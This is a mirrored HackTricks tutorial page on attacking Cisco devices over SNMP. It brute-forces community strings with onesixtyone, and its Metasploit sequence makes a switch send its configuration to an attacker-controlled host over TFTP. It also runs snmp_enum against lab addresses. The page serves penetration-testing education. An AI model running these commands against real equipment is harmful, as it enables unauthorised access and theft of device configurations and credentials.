mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-20 10:03:51 +00:00
81 lines
5.5 KiB
Markdown
81 lines
5.5 KiB
Markdown
# Cisco SNMP
|
||
|
||
<details>
|
||
|
||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||
|
||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||
|
||
</details>
|
||
|
||
This page was copied from [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
|
||
|
||
## Configuration exfiltration and enumeration via SNMP <a href="#e21c" id="e21c"></a>
|
||
|
||
**SNMP (Simple Network Management Protocol)** is a protocol that allows you to monitor the status of devices on a computer network. It can be network equipment, IP phones, corporate servers or anything else.
|
||
|
||
**SNMP uses the UDP transport layer protocol with port numbers 161/UDP and 162/UDP.** So-called community strings are used to refer SNMP agents to the server. These are, shall we say, special passwords for communicating with the SNMP server. **Community strings have either RO (read-only) or RW (read-write) permissions.**
|
||
|
||
**Actually, SNMP can not only monitor the equipment status, but also manage it in full: dump configs, change the configuration, etc.** If a pentester can look up the value of community strings, he actually gains access to the equipment. **However, it all depends on which string he bruteforced— to RO or RW community string.**
|
||
|
||
**Bruteforce community strings can be implemented using the** [**onesixtyone**](https://github.com/trailofbits/onesixtyone) **utility.** It will take as input the dictionary for bruteforcing and the IP addresses of the target hosts. The targets will be:
|
||
|
||
* **10.10.100.10 — Cisco vIOS Switch**
|
||
* **10.10.100.254 — Cisco vIOS Router**
|
||
|
||
```
|
||
~$ onesixtyone -c communitystrings -i targets
|
||
```
|
||
|
||
We found out what community strings are used on those devices. This opens the way for us to exploititation.
|
||
|
||
### 8.1 cisco\_config\_tftp <a href="#1dbf" id="1dbf"></a>
|
||
|
||
With the Metasploit framework, namely the **cisco\_config\_tftp** module, you can pull the device configuration by knowing the value of the community string. The string that has the rights to the RW is **private**.
|
||
|
||
We will need the following:
|
||
|
||
* **RW community string (COMMUNITY)**
|
||
* **Attacker’s IP address (LHOST)**
|
||
* **Target equipment IP address (RHOSTS)**
|
||
* **the path in which the module outputs the configuration of the device (OUTPUTDIR)**
|
||
|
||
```bash
|
||
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set COMMUNITY private
|
||
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set RHOSTS 10.10.100.10
|
||
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set LHOST 10.10.100.50
|
||
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set OUTPUTDIR /home/necreas1ng/snmp
|
||
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > exploit
|
||
```
|
||
|
||
After starting the module, the host configuration with address 10.10.100.10 (10.10.100.10.txt) will be downloaded to the specified folder.
|
||
|
||
.png>)
|
||
|
||
### 8.2 snmp\_enum <a href="#3429" id="3429"></a>
|
||
|
||
With this module you can find out information about the target hardware. Everything is exactly the same: specify **COMMUNITY** (by the way, even a string with **RO permissions will do**) and the IP address of the target device.
|
||
|
||
```bash
|
||
msf6 auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY public
|
||
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.100.10
|
||
msf6 auxiliary(scanner/snmp/snmp_enum) > exploit
|
||
```
|
||
|
||
<figure><img src="../../.gitbook/assets/image (218).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
<details>
|
||
|
||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||
|
||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||
|
||
</details>
|